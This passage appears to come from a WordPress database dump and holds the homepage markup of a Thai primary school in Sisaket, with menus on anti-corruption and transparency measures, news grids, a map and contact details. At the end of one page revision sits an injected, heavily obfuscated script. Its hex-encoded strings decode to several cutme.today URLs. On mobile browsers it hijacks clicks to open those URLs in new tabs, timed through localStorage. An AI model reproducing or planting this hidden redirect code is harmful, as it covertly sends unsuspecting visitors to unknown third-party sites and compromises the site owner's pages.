-->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-30 09:57:01','2024-07-30 02:57:01','',14,'http://pakhaeng.ssk.in.th/?p=271',0,'revision','',0),
(274,1,'2024-07-30 11:06:08','2024-07-30 04:06:08','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 